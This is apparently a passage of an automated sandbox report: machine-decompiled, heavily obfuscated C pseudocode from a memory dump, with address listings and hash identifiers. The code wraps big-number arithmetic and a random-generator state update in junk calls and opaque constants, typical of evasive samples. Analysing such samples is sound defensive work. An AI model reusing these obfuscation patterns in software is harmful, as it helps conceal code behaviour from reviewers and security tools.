                                                                									_t427 = E00346BB0(__eflags,  *((intOrPtr*)(_t584[2] + (_t425 - _t426) * 4)), 0xffffffff);
                                                                									_t525 = _v56;
                                                                									_t606 = _t606 + 0x20;
                                                                									__eflags = _t427 & 0x00000001;
                                                                								} while ((_t427 & 0x00000001) != 0);
                                                                								__eflags = _t481 | _t525;
                                                                								if((_t481 | _t525) == 0) {
                                                                									_t551 = _v28;
                                                                									_t460 = 0;
                                                                									__eflags = 0;
                                                                									_v56 = 0;
                                                                								} else {
                                                                									E0035E610(_v64, _t481);
                                                                									_t551 = _v28;
                                                                									E0035E320(_t551, _v64);
                                                                									_t606 = _t606 + 0x10;
                                                                								}
                                                                								L25:
                                                                								_t492 =  *_t551;
                                                                								__eflags = _t492 - _v20;
                                                                								if(_t492 != _v20) {
                                                                									_t576 = _v28;
                                                                									_t418 = _t492 + 1;
                                                                									 *_t576 = _t418;
                                                                									__eflags = _t492 - _t576[1];
                                                                									if(_t492 >= _t576[1]) {
                                                                										_t576[1] = _t418;
                                                                										__eflags = _t418 << 2;
                                                                										_t421 = E00343F90(_t576[2], _t418 << 2);
                                                                										_t606 = _t606 + 8;
                                                                										_t576[2] = _t421;
                                                                									}
                                                                									 *((intOrPtr*)(_t576[2] + _v24 * 4)) = 0;
                                                                								}
                                                                								_v60 = _t460;
                                                                								_t461 = _v28;
                                                                								__eflags = _v32;
                                                                								if(__eflags <= 0) {
                                                                									L53:
                                                                									_t317 = _a4;
                                                                									_t533 = _t317;
                                                                									_t495 =  *_a12 -  *_a16;
                                                                									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 8)) + _t495 * 4)) - 1;
                                                                									asm("sbb ecx, 0xffffffff");
                                                                									 *_t533 = _t495;
                                                                									_t586 =  *_t461;
                                                                									__eflags = _t586;
                                                                									if(_t586 <= 0) {
                                                                										__eflags = 0;
                                                                										L58:
                                                                										_t319 = _v28;
                                                                										 *_t319 = 0;
                                                                										_t463 = _t319;
                                                                										E00347D70(_t319, _a8);
                                                                										_t584 = _v52;
                                                                										_t549 = _v64;
                                                                										L6:
                                                                										_push(_t549);
                                                                										E0035EBC0();
                                                                										_push(_v68);
                                                                										E0035EBC0();
                                                                										_push(_v40);
                                                                										E0035EBC0();
                                                                										_push(_t463);
                                                                										E0035EBC0();
                                                                										_push(_t584);
                                                                										E0035EBC0();
                                                                										_push(_v80);
                                                                										return E0035EBC0();
                                                                									}
                                                                									_t464 = 0;
                                                                									_v24 = _t461[2];
                                                                									_t328 = 0;
                                                                									__eflags = 0;
                                                                									do {
                                                                										_t552 = _v24;
                                                                										_v32 =  *(_t552 + _t586 * 4 - 4);
                                                                										_t329 = E00353860( *(_t552 + _t586 * 4 - 4), _t328, _v60, _v56);
                                                                										__eflags = _t329;
                                                                										 *(_t552 + _t586 * 4 - 4) = _t329;
                                                                										_t535 =  !=  ? _t586 : _t464;
                                                                										__eflags = _t464;
                                                                										_t464 =  ==  ?  !=  ? _t586 : _t464 : _t464;
                                                                										_t498 = _t533 * _v60;
                                                                										_t533 = (_t329 * _v60 >> 0x20) + _t329 * _v56;
                                                                										_t331 = E00341A50(0, 0, _t329 * _v60, _t498 + _t533);
                                                                										_t606 = _t606 + 0x10;
                                                                										_t328 = _t331 + _v32;
                                                                										_t586 = _t586 - 1;
                                                                										__eflags = _t586;
                                                                									} while (_t586 > 0);
                                                                									goto L58;
                                                                								} else {
                                                                									_t465 = _v44;
                                                                									_v112 = E00341460(__eflags, _t465, 0xffffffff);
                                                                									_v96 = _t465 + 1;
                                                                									_v92 = 4 + _t465 * 4;
                                                                									_t336 = E00341460(__eflags, _v24, 0xa8f61def);
                                                                									_v20 = _v24 + 1;
                                                                									_t338 = E003422E0(__eflags, _v24 + 0x9ecacfc6, _t465);
                                                                									_v104 = E00349D50(0x5413097) + _t338;
                                                                									E003422E0(__eflags, _v20, _t465);
                                                                									_t344 = E003422E0(__eflags, E00341460(__eflags, _t465, 0xbfefafd5) + 1, 0xbfefafd5);
                                                                									E00341460(__eflags, _t465, 1);
                                                                									_t621 = _t606 + 0x3c;
                                                                									_t466 = _v28;
                                                                									_v100 = _t465 + 0x18a13f73;
                                                                									_t347 = 0;
                                                                									_v88 = _t344 + 0x3baa12e3;
                                                                									_v108 = _t336 - _t465 + 0x5709e211;
                                                                									_t590 = _v32;
                                                                									do {
                                                                										_v120 = _t347;
                                                                										_v116 = _v108 - _t347;
                                                                										E00341460(__eflags, _t590, 0xffffffff);
                                                                										_v84 = _t590;
                                                                										_v36 =  *((intOrPtr*)(_t466 + 8));
                                                                										_v76 = E003422E0(__eflags, _v100 + _t590, 0x18a13f74);
                                                                										_v32 = _t590 - 1;
                                                                										E00341460(__eflags, _t590 - 1, _v44);
                                                                										_t355 = E003413C0(E003422E0(__eflags, 0, 0xffffffff), 0,  *((intOrPtr*)(_v36 + _t352 * 4)),  *((intOrPtr*)(_v36 + (_t352 - _t354) * 4)), 0);
                                                                										_t502 = _v52[2];
                                                                										_t592 =  *(_t502 + _v112 * 4);
                                                                										_v72 = _t502;
                                                                										_t358 = E00353860(_t355, _t532, _t592, 0);
                                                                										__eflags = _t358 - 0xffffffff;
                                                                										_t503 = _t532;
                                                                										_v124 = _t592;
                                                                										asm("sbb edx, 0x0");
                                                                										_t538 =  <  ? _t503 : 0;
                                                                										_v20 =  <  ? _t503 : 0;
                                                                										_t540 =  <  ? _t358 : 0xffffffff;
                                                                										_v24 =  <  ? _t358 : 0xffffffff;
                                                                										_t542 = (_t358 * _t592 >> 0x20) + _t503 * _t592;
                                                                										asm("adc ebx, 0x2892411f");
                                                                										_t360 = E00341A50(_t355 + 0xd2627799, _t532, _t358 * _t592, _t542);
                                                                										_t471 = _t360 - E00342070(0xb6167735, 0xa7951915);
                                                                										asm("sbb esi, edx");
                                                                										_v48 = _t542;
                                                                										_v72 =  *((intOrPtr*)(_v72 + _v44 * 4 - 8));
                                                                										__eflags = _v76 + 0x6e556da6;
                                                                										_t366 = E00341460(_v76 + 0x6e556da6, _v76 + 0x6e556da6, 0xfffffffe);
                                                                										_t506 = _v20;
                                                                										_t629 = _t621 + 0x50;
                                                                										_t543 = _v36;
                                                                										_v128 =  *((intOrPtr*)(_t543 + 0x46aa4968 + _t366 * 4));
                                                                										_t368 = _v24;
                                                                										while(1) {
                                                                											_v20 = _t506;
                                                                											_v24 = _t368;
                                                                											_t369 = E00343A30(_t368, _t506, _v72, 0);
                                                                											_v36 = _t543;
                                                                											_t507 = E00342070(0x6474008c, 0x8f07580a);
                                                                											_v76 = _t471;
                                                                											_t472 = _t471 << _t507;
                                                                											__eflags = _t507 & 0x00000020;
                                                                											_t566 =  !=  ? _t472 : (_v48 << 0x00000020 | _t471) << _t507;
                                                                											_t473 =  !=  ? 0 : _t472;
                                                                											_t474 = ( !=  ? 0 : _t472) | _v128;
                                                                											_t376 = E00342070(0x6474008c, 0x8f07580a);
                                                                											_t632 = _t629 + 0x20;
                                                                											__eflags = (( !=  ? 0 : _t472) | _v128) - _t369;
                                                                											asm("sbb edi, [ebp-0x20]");
                                                                											if((( !=  ? 0 : _t472) | _v128) >= _t369) {
                                                                												break;
                                                                											}
                                                                											_t415 = E00342070(0x393c8f08, 0xec16389c);
                                                                											_t569 = _t543;
                                                                											asm("adc edi, ecx");
                                                                											_t595 = _t415 + _v24 + 0xa2b7705b;
                                                                											asm("adc edi, 0x9cee9f69");
                                                                											E00341750(__eflags, _v24, _v20, 0xffffffff, 0xffffffff);
                                                                											_t629 = _t632 + 0x18;
                                                                											_t368 = _t595;
                                                                											_t506 = _t569;
                                                                											_t471 = _v76 + _v124;
                                                                											__eflags = _t471;
                                                                											asm("adc dword [ebp-0x2c], 0x0");
                                                                											if(_t471 == 0) {
                                                                												continue;
                                                                											}
                                                                											L37:
                                                                											_t509 = _v80;
                                                                											_t475 = _v40;
                                                                											__eflags = _t569 - 1;
                                                                											asm("sbb edx, 0x0");
                                                                											_t377 =  *(_t509 + 8);
                                                                											 *_t377 = _t595;
                                                                											_t377[1] = _t569;
                                                                											 *_t509 = 2;
                                                                											E0035E690(_t569 - 1, _v68, _v52, _t509);
                                                                											_t633 = _t632 + 0xc;
                                                                											_t379 = _v44;
                                                                											__eflags = _t379 -  *((intOrPtr*)(_t475 + 4));
                                                                											if(_t379 >=  *((intOrPtr*)(_t475 + 4))) {
                                                                												 *((intOrPtr*)(_t475 + 4)) = _v96;
                                                                												_t414 = E00343F90( *((intOrPtr*)(_t475 + 8)), _v92);
                                                                												_t633 = _t633 + 8;
                                                                												 *((intOrPtr*)(_t475 + 8)) = _t414;
                                                                												_t379 = _v44;
                                                                											}
                                                                											__eflags = _t379;
                                                                											 *_t475 = 0;
                                                                											if(__eflags < 0) {
                                                                												L44:
                                                                												_t476 = _v40;
                                                                												_t380 = E0035E3C0(_t509, __eflags, _t476, _v68);
                                                                												_t634 = _t633 + 8;
                                                                												__eflags = _t380;
                                                                												if(_t380 != 0) {
                                                                													E0035E380(_t476, _v52);
                                                                													_t401 = E00349D50(0x11f2bfb2);
                                                                													_t634 = _t634 + 0xc;
                                                                													_t595 = _t595 + _t401 - 0x7586bf1f;
                                                                												}
                                                                												E0035E650(_t476, _v68);
                                                                												_t635 = _t634 + 8;
                                                                												_t570 =  *_t476;
                                                                												__eflags = _t570;
                                                                												if(_t570 > 0) {
                                                                													_t478 = 0;
                                                                													__eflags = 1;
                                                                													_v36 = 1 - _v84;
                                                                													_v20 = _v40[2];
                                                                													_v48 = _v28[2];
                                                                													0;
                                                                													0;
                                                                													do {
                                                                														_v24 =  *((intOrPtr*)(_v20 + _t478 * 4));
                                                                														_t396 = E003422E0(__eflags, 0, _t478);
                                                                														E00341460(__eflags, _t478, _v32);
                                                                														_t635 = _t635 + 0x10;
                                                                														_t478 = _t478 + 1;
                                                                														 *((intOrPtr*)(_v48 - (_t396 + _v36 << 2))) = _v24;
                                                                														_t570 =  *_v40;
                                                                														__eflags = _t478 - _t570;
                                                                													} while (__eflags < 0);
                                                                												}
                                                                												goto L49;
                                                                											} else {
                                                                												_t479 = 0;
                                                                												_v24 = _v28[2];
                                                                												_v20 = _v40[2];
                                                                												do {
                                                                													_t509 = _v24;
                                                                													_t408 =  *(_v24 + (_v32 + _t479) * 4);
                                                                													__eflags = _t408;
                                                                													 *(_v20 + _t479 * 4) = _t408;
                                                                													if(__eflags != 0) {
                                                                														_t412 = E003422E0(__eflags, 0, _t479);
                                                                														_t633 = _t633 + 8;
                                                                														_t509 = 1 - _t412;
                                                                														 *_v40 = 1 - _t412;
                                                                													}
                                                                													_t409 = E003422E0(__eflags, _t479, 0x19c77e59);
                                                                													_t410 = E00349D50(0x7db37ef5);
                                                                													E00341460(__eflags, _t479, 1);
                                                                													_t633 = _t633 + 0x14;
                                                                													__eflags = _t479 - _v44;
                                                                													_t479 = _t409 + _t410 + 1;
                                                                												} while (__eflags != 0);
                                                                												goto L44;
                                                                											}
                                                                										}
                                                                										_t595 = _v24;
                                                                										__eflags = _t376 & 0x00000020;
                                                                										_t569 =  ==  ? (_v20 << 0x00000020 | _t595) >> _t376 : _v20 >> _t376;
                                                                										goto L37;
                                                                										L49:
                                                                										__eflags = _t570 - _v44;
                                                                										if(_t570 <= _v44) {
                                                                											_t387 = E00341460(__eflags, _t570 - E00349D50(0x1f4aa581), _v116);
                                                                											__eflags = _v88 - _t570;
                                                                											E00353580(_v28[2] + _t387 * 4 - 0x13056b4c, 0, 0x1157b474 + (_v88 - _t570) * 4);
                                                                											_t635 = _t635 + 0x18;
                                                                										}
                                                                										_t510 = _a4;
                                                                										_t532 = _v84;
                                                                										__eflags = _t595;
                                                                										_t461 = _v28;
                                                                										 *( *((intOrPtr*)(_t510 + 8)) + _t532 * 4 - 4) = _t595;
                                                                										_t590 = _v32;
                                                                										if(_t595 != 0) {
                                                                											 *_t510 = _t590;
                                                                										}
                                                                										_t383 = E00349D50(0xf239476a);
                                                                										_t606 = _t635 + 4;
                                                                										_t347 = _v120 - _t383 + 0x964d47c7;
                                                                										__eflags = _t347 - _v104;
                                                                									} while (__eflags != 0);
                                                                									goto L53;
                                                                								}
                                                                							}
                                                                						}
                                                                						_t484 = _a12;
                                                                						_t527 = _a4;
                                                                						_t582 =  *_t484;
                                                                						__eflags =  *(_t527 + 4) - _t582;
                                                                						if( *(_t527 + 4) < _t582) {
                                                                							 *(_t527 + 4) = _t582;
                                                                							__eflags = _t582 << E00349D50(0x647400ae);
                                                                							_t450 = E00343F90( *((intOrPtr*)(_a4 + 8)), _t582 << E00349D50(0x647400ae));
                                                                							_t527 = _a4;
                                                                							_t602 = _t602 + 0xc;
                                                                							 *((intOrPtr*)(_t527 + 8)) = _t450;
                                                                							_t582 =  *_t484;
                                                                						}
                                                                						__eflags = _t582;
                                                                						if(_t582 <= 0) {
                                                                							__eflags = 0;
                                                                							goto L22;
                                                                						} else {
                                                                							_t486 = 0;
                                                                							_t599 = 0;
                                                                							__eflags = 0;
                                                                							_v48 = _t484[2];
                                                                							_v36 =  *((intOrPtr*)(_t527 + 8));
                                                                							_v32 =  *((intOrPtr*)(_a16 + 8));
                                                                							0;
                                                                							0;
                                                                							do {
                                                                								_v20 = _t486;
                                                                								_v24 =  *((intOrPtr*)(_v48 + _t582 * 4 - 4));
                                                                								 *((intOrPtr*)(_v36 + _t582 * 4 - 4)) = E00353860( *((intOrPtr*)(_v48 + _t582 * 4 - 4)), _t599,  *_v32, 0);
                                                                								_t444 = E00345920(_v36, _t443, 0);
                                                                								_t602 = _t602 + 8;
                                                                								__eflags = _t444 & 0x00000001;
                                                                								_t445 = _v20;
                                                                								_t487 =  !=  ? _t582 : _t486;
                                                                								__eflags = _t445;
                                                                								_t486 =  !=  ? _t445 :  !=  ? _t582 : _t486;
                                                                								_t599 = E00352E20(_v24, _t599,  *_v32, 0);
                                                                								_t582 = _t582 - 1;
                                                                								__eflags = _t582;
                                                                							} while (_t582 > 0);
                                                                							L22:
                                                                							_t549 = _v64;
                                                                							E0035E610(_a8, 0);
                                                                							_t584 = _v52;
                                                                							 *_a4 = 0;
                                                                							L5:
                                                                							_t463 = _v28;
                                                                							goto L6;
                                                                						}
                                                                					}
                                                                					 *_a4 = 0;
                                                                					E0035E610(_a8, 0);
                                                                					L4:
                                                                					goto L5;
                                                                				}
                                                                				 *_a4 = 0;
                                                                				E00347D70(_t455, _a8);
                                                                				goto L4;
                                                                			}





































































































































                                                                0x0035da70
                                                                0x0035da79
                                                                0x0035da81
                                                                0x0035da88
                                                                0x0035da90
                                                                0x0035da97
                                                                0x0035da9f
                                                                0x0035daa7
                                                                0x0035daae
                                                                0x0035dab3
                                                                0x0035dab8
                                                                0x0035dacf
                                                                0x0035dad4
                                                                0x0035dad7
                                                                0x0035dad9
                                                                0x0035db38
                                                                0x0035db3b
                                                                0x0035db3e
                                                                0x0035db40
                                                                0x0035db43
                                                                0x0035dc09
                                                                0x0035dc20
                                                                0x0035dc22
                                                                0x0035dc25
                                                                0x0035dc28
                                                                0x0035dc2e
                                                                0x0035dc36
                                                                0x0035dc3b
                                                                0x0035dc40
                                                                0x0035dc46
                                                                0x0035dc48
                                                                0x0035dc4a
                                                                0x0035dc4d
                                                                0x0035dc4f
                                                                0x0035dc5d
                                                                0x0035dc62
                                                                0x0035dc65
                                                                0x0035dc65
                                                                0x0035dc68
                                                                0x0035dc6f
                                                                0x0035dc7b
                                                                0x0035dc80
                                                                0x0035dc83
                                                                0x0035dc85
                                                                0x0035dc88
                                                                0x0035dc8b
                                                                0x0035dc90
                                                                0x0035dd44
                                                                0x0035dd4b
                                                                0x00000000
                                                                0x0035dc96
                                                                0x0035dc96
                                                                0x0035dc96
                                                                0x0035dc98
                                                                0x0035dca0
                                                                0x0035dca6
                                                                0x0035dca9
                                                                0x0035dcb2
                                                                0x0035dcd1
                                                                0x0035dce0
                                                                0x0035dcef
                                                                0x0035dcf2
                                                                0x0035dcf7
                                                                0x0035dcfa
                                                                0x0035dcfd
                                                                0x0035dcfd
                                                                0x0035dd03
                                                                0x0035dd05
                                                                0x0035dd52
                                                                0x0035dd55
                                                                0x0035dd55
                                                                0x0035dd57
                                                                0x0035dd07
                                                                0x0035dd0c
                                                                0x0035dd15
                                                                0x0035dd19
                                                                0x0035dd1e
                                                                0x0035dd1e
                                                                0x0035dd5e
                                                                0x0035dd61
                                                                0x0035dd63
                                                                0x0035dd65
                                                                0x0035dd67
                                                                0x0035dd6a
                                                                0x0035dd6d
                                                                0x0035dd6f
                                                                0x0035dd72
                                                                0x0035dd74
                                                                0x0035dd77
                                                                0x0035dd7e
                                                                0x0035dd83
                                                                0x0035dd86
                                                                0x0035dd86
                                                                0x0035dd8f
                                                                0x0035dd8f
                                                                0x0035dd99
                                                                0x0035dd9c
                                                                0x0035dd9f
                                                                0x0035dda1
                                                                0x0035e285
                                                                0x0035e288
                                                                0x0035e290
                                                                0x0035e295
                                                                0x0035e297
                                                                0x0035e29b
                                                                0x0035e29e
                                                                0x0035e2a0
                                                                0x0035e2a2
                                                                0x0035e2a4
                                                                0x0035e300
                                                                0x0035e302
                                                                0x0035e302
                                                                0x0035e305
                                                                0x0035e307
                                                                0x0035e30d
                                                                0x0035e315
                                                                0x0035e318
                                                                0x0035daf4
                                                                0x0035daf4
                                                                0x0035daf5
                                                                0x0035dafd
                                                                0x0035db00
                                                                0x0035db08
                                                                0x0035db0b
                                                                0x0035db13
                                                                0x0035db14
                                                                0x0035db1c
                                                                0x0035db1d
                                                                0x0035db25
                                                                0x0035db34
                                                                0x0035db34
                                                                0x0035e2a9
                                                                0x0035e2ab
                                                                0x0035e2ae
                                                                0x0035e2ae
                                                                0x0035e2b0
                                                                0x0035e2b0
                                                                0x0035e2b7
                                                                0x0035e2c2
                                                                0x0035e2c9
                                                                0x0035e2cd
                                                                0x0035e2d3
                                                                0x0035e2d6
                                                                0x0035e2d8
                                                                0x0035e2e2
                                                                0x0035e2e6
                                                                0x0035e2f0
                                                                0x0035e2f5
                                                                0x0035e2f8
                                                                0x0035e2fb
                                                                0x0035e2fb
                                                                0x0035e2fb
                                                                0x00000000
                                                                0x0035dda7
                                                                0x0035dda9
                                                                0x0035ddb5
                                                                0x0035ddbb
                                                                0x0035ddc5
                                                                0x0035ddd3
                                                                0x0035dde6
                                                                0x0035ddeb
                                                                0x0035de04
                                                                0x0035de0b
                                                                0x0035de28
                                                                0x0035de35
                                                                0x0035de3a
                                                                0x0035de45
                                                                0x0035de54
                                                                0x0035de57
                                                                0x0035de59
                                                                0x0035de5c
                                                                0x0035de5f
                                                                0x0035de92
                                                                0x0035de95
                                                                0x0035de9d
                                                                0x0035dea3
                                                                0x0035deae
                                                                0x0035deb1
                                                                0x0035dec9
                                                                0x0035decf
                                                                0x0035ded3
                                                                0x0035def7
                                                                0x0035df06
                                                                0x0035df0c
                                                                0x0035df0f
                                                                0x0035df17
                                                                0x0035df1c
                                                                0x0035df1f
                                                                0x0035df21
                                                                0x0035df24
                                                                0x0035df2c
                                                                0x0035df2f
                                                                0x0035df37
                                                                0x0035df3d
                                                                0x0035df42
                                                                0x0035df4a
                                                                0x0035df54
                                                                0x0035df72
                                                                0x0035df7a
                                                                0x0035df7c
                                                                0x0035df83
                                                                0x0035df89
                                                                0x0035df91
                                                                0x0035df96
                                                                0x0035df99
                                                                0x0035df9c
                                                                0x0035dfa6
                                                                0x0035dfa9
                                                                0x0035dfb0
                                                                0x0035dfb5
                                                                0x0035dfb9
                                                                0x0035dfbd
                                                                0x0035dfcc
                                                                0x0035dfe1
                                                                0x0035dfe3
                                                                0x0035dfee
                                                                0x0035dff0
                                                                0x0035dff3
                                                                0x0035dff6
                                                                0x0035dffe
                                                                0x0035e008
                                                                0x0035e00d
                                                                0x0035e010
                                                                0x0035e012
                                                                0x0035e015
                                                                0x00000000
                                                                0x00000000
                                                                0x0035e021
                                                                0x0035e031
                                                                0x0035e035
                                                                0x0035e037
                                                                0x0035e03d
                                                                0x0035e049
                                                                0x0035e04e
                                                                0x0035e054
                                                                0x0035e056
                                                                0x0035e058
                                                                0x0035e058
                                                                0x0035e05b
                                                                0x0035e05f
                                                                0x00000000
                                                                0x00000000
                                                                0x0035e084
                                                                0x0035e084
                                                                0x0035e087
                                                                0x0035e08a
                                                                0x0035e092
                                                                0x0035e095
                                                                0x0035e098
                                                                0x0035e09a
                                                                0x0035e09d
                                                                0x0035e0a6
                                                                0x0035e0ab
                                                                0x0035e0ae
                                                                0x0035e0b1
                                                                0x0035e0b4
                                                                0x0035e0b9
                                                                0x0035e0c2
                                                                0x0035e0c7
                                                                0x0035e0ca
                                                                0x0035e0cd
                                                                0x0035e0cd
                                                                0x0035e0d0
                                                                0x0035e0d2
                                                                0x0035e0d8
                                                                0x0035e170
                                                                0x0035e173
                                                                0x0035e177
                                                                0x0035e17c
                                                                0x0035e17f
                                                                0x0035e181
                                                                0x0035e187
                                                                0x0035e194
                                                                0x0035e199
                                                                0x0035e19c
                                                                0x0035e19c
                                                                0x0035e1a7
                                                                0x0035e1ac
                                                                0x0035e1af
                                                                0x0035e1b1
                                                                0x0035e1b3
                                                                0x0035e1bd
                                                                0x0035e1bf
                                                                0x0035e1c5
                                                                0x0035e1c8
                                                                0x0035e1d1
                                                                0x0035e1da
                                                                0x0035e1de
                                                                0x0035e1e0
                                                                0x0035e1e6
                                                                0x0035e1ec
                                                                0x0035e1fd
                                                                0x0035e202
                                                                0x0035e20e
                                                                0x0035e211
                                                                0x0035e216
                                                                0x0035e218
                                                                0x0035e218
                                                                0x0035e1e0
                                                                0x00000000
                                                                0x0035e0de
                                                                0x0035e0e1
                                                                0x0035e0e6
                                                                0x0035e0ef
                                                                0x0035e133
                                                                0x0035e136
                                                                0x0035e13e
                                                                0x0035e141
                                                                0x0035e143
                                                                0x0035e146
                                                                0x0035e14b
                                                                0x0035e150
                                                                0x0035e15b
                                                                0x0035e15d
                                                                0x0035e15d
                                                                0x0035e106
                                                                0x0035e115
                                                                0x0035e124
                                                                0x0035e129
                                                                0x0035e12c
                                                                0x0035e12f
                                                                0x0035e12f
                                                                0x00000000
                                                                0x0035e133
                                                                0x0035e0d8
                                                                0x0035e070
                                                                0x0035e07f
                                                                0x0035e081
                                                                0x00000000
                                                                0x0035e21c
                                                                0x0035e21c
                                                                0x0035e21f
                                                                0x0035e23c
                                                                0x0035e24e
                                                                0x0035e25b
                                                                0x0035e260
                                                                0x0035e260
                                                                0x0035e263
                                                                0x0035e266
                                                                0x0035e269
                                                                0x0035e26b
                                                                0x0035e271
                                                                0x0035e275
                                                                0x0035e278
                                                                0x0035e27e
                                                                0x0035e27e
                                                                0x0035de75
                                                                0x0035de7a
                                                                0x0035de84
                                                                0x0035de89
                                                                0x0035de89
                                                                0x00000000
                                                                0x0035de92
                                                                0x0035dda1
                                                                0x0035dc90
                                                                0x0035db49
                                                                0x0035db4c
                                                                0x0035db4f
                                                                0x0035db51
                                                                0x0035db54
                                                                0x0035db56
                                                                0x0035db68
                                                                0x0035db71
                                                                0x0035db76
                                                                0x0035db79
                                                                0x0035db7c
                                                                0x0035db7f
                                                                0x0035db7f
                                                                0x0035db81
                                                                0x0035db83
                                                                0x0035dd25
                                                                0x00000000
                                                                0x0035db89
                                                                0x0035db8f
                                                                0x0035db91
                                                                0x0035db91
                                                                0x0035db93
                                                                0x0035db99
                                                                0x0035db9f
                                                                0x0035dba8
                                                                0x0035dbac
                                                                0x0035dbb0
                                                                0x0035dbb3
                                                                0x0035dbba
                                                                0x0035dbce
                                                                0x0035dbd5
                                                                0x0035dbda
                                                                0x0035dbdd
                                                                0x0035dbdf
                                                                0x0035dbe2
                                                                0x0035dbe5
                                                                0x0035dbe7
                                                                0x0035dbfa
                                                                0x0035dbfc
                                                                0x0035dbfc
                                                                0x0035dbfc
                                                                0x0035dd27
                                                                0x0035dd27
                                                                0x0035dd2f
                                                                0x0035dd3a
                                                                0x0035dd3d
                                                                0x0035daf1
                                                                0x0035daf1
                                                                0x00000000
                                                                0x0035daf1
                                                                0x0035db83
                                                                0x0035dade
                                                                0x0035dae9
                                                                0x0035daee
                                                                0x00000000
                                                                0x0035daee
                                                                0x0035dabd
                                                                0x0035dac7
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8272dc58c8463e3ea4c0ca10e49dc00747e1c5611c2c700ebc6d3bedf35e0a82
                                                                • Instruction ID: 4b2e0b1a3f09a00ebfbc062d9fbcfe98e9ec855d1420445b026362b98a606fed
                                                                • Opcode Fuzzy Hash: 8272dc58c8463e3ea4c0ca10e49dc00747e1c5611c2c700ebc6d3bedf35e0a82
                                                                • Instruction Fuzzy Hash: B74291B5D002099FCB05DFA8DC81EAEB7F5AF49315F154528F819AB352E731AE04CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E00355BF0(void* __eflags) {
                                                                				signed int _v20;
                                                                				signed int _v24;
                                                                				unsigned int _v28;
                                                                				signed int _v32;
                                                                				signed int _v36;
                                                                				void* _t48;
                                                                				signed int _t49;
                                                                				signed int _t50;
                                                                				signed int _t51;
                                                                				signed int _t57;
                                                                				void* _t60;
                                                                				unsigned int _t64;
                                                                				signed int _t69;
                                                                				signed int _t71;
                                                                				signed int _t74;
                                                                				signed int _t75;
                                                                				signed int _t77;
                                                                				signed int _t78;
                                                                				signed int _t81;
                                                                				signed int _t86;
                                                                				signed int _t97;
                                                                				signed int _t98;
                                                                				signed int _t100;
                                                                				void* _t103;
                                                                				signed int _t104;
                                                                				signed int _t105;
                                                                				signed int _t106;
                                                                				signed int _t107;
                                                                				signed int _t111;
                                                                				signed int _t120;
                                                                				signed int _t121;
                                                                				signed int _t128;
                                                                				signed int _t131;
                                                                				signed int _t169;
                                                                				void* _t179;
                                                                				signed int _t183;
                                                                				signed int _t188;
                                                                				signed int _t194;
                                                                				void* _t195;
                                                                				void* _t196;
                                                                				signed int _t237;
                                                                
                                                                				_t169 =  *0x364194; // 0x1
                                                                				_t48 = E00349D50(0x647402c3);
                                                                				_t196 = _t195 + 4;
                                                                				_t234 = _t169 - _t48;
                                                                				if(_t169 > _t48) {
                                                                					_t179 = 0xfffffc74;
                                                                					0;
                                                                					do {
                                                                						_v24 = E003420A0(_t234,  *(_t179 + 0x363b60), 0xffffffff);
                                                                						_t69 = E00349D50(0xe47400ac);
                                                                						_t71 = E003420A0(_t234, E00349D50(0x5c38c288), 0xffffffff);
                                                                						_t74 = E00343750(_t234,  !(E00342DC0(_t234, _v24,  !_t69)), _t71 | 0x384cc224);
                                                                						_t196 = _t196 + 0x28;
                                                                						 *(_t179 + 0x363b60) =  *(0x360434 + ( *(_t179 + 0x363b64) & 0x00000001) * 4) ^  *(_t179 + 0x364194) ^ ( *(_t179 + 0x363b64) & 0x7ffffffe | _t74) >> 0x00000001;
                                                                						_t179 = _t179 + 4;
                                                                						_t235 = _t179;
                                                                					} while (_t179 != 0);
                                                                					_t75 = 0xe3;
                                                                					_t120 = 0xe3;
                                                                					0;
                                                                					do {
                                                                						_v24 = _t75;
                                                                						_v20 = 0x3637d4[_t75];
                                                                						_t77 = E00349D50(0xe47400ac);
                                                                						_t78 = E00342DC0(_t235, 0xe98fe736, 0x167018c9);
                                                                						_t121 = _t120 - E00349D50(0xdd67dd4);
                                                                						_v36 = _t121 + 0x69a27d79;
                                                                						_v20 =  *((intOrPtr*)(_t121 * 4 - 0x593fd248));
                                                                						_t81 = E003420A0(_t235, 0x7ffffffe, 0xffffffff);
                                                                						E00343750(_t235, _v20, 0x7ffffffe);
                                                                						_v28 =  !(_t78 & _v20 & _t77);
                                                                						_t86 = E00349D50(0x58908707);
                                                                						_v28 = E00342DC0(_t235, E003420A0(_t235,  !_t81 & _v20 & 0xc31b7854 | _t86 &  !( !_t81 & _v20), _t78 & _v20 & _t77 & 0xc31b7854 | E00349D50(0x58908707) & _v28),  !_t81 & _v20 & _t78 & _v20 & _t77);
                                                                						E00342DC0(_t235,  !_t81 & _v20, _t78 & _v20 & _t77);
                                                                						E00349D50(0x9b8bffb1);
                                                                						_v28 = _v28 >> 1;
                                                                						_t128 =  *(0x363448 + _v24 * 4);
                                                                						_v32 = _t128;
                                                                						_t183 =  *(0x360434 + (_v20 & 0x00000001) * 4);
                                                                						_v20 = _t183;
                                                                						_t97 = E003420A0(_t235, 0xc62da7e4, 0xffffffff);
                                                                						_t98 = E00343750(_t235, _v32, _t97);
                                                                						_t120 = _v36;
                                                                						_t188 = (_t98 |  !_t128 & 0xc62da7e4) ^ (_t97 & _v20 |  !_t183 & 0xc62da7e4);
                                                                						E003420A0(_t235, _v20, _v32);
                                                                						_t100 = _v28;
                                                                						E003420A0(_t235, _t188, _t100);
                                                                						0x3637d4[_v24] = _t188 ^ _t100;
                                                                						_t103 = E00349D50(0x647402c3);
                                                                						_t196 = _t196 + 0x68;
                                                                						_t236 = _t120 - _t103;
                                                                						_t75 = _t120;
                                                                					} while (_t120 != _t103);
                                                                					_t104 = E00343750(_t236,  *0x364190, 0x80000000);
                                                                					_t131 =  *0x3637d4; // 0x48a8ef9f
                                                                					_t105 = E00349D50(0x1b8bff52);
                                                                					_v24 = _t131;
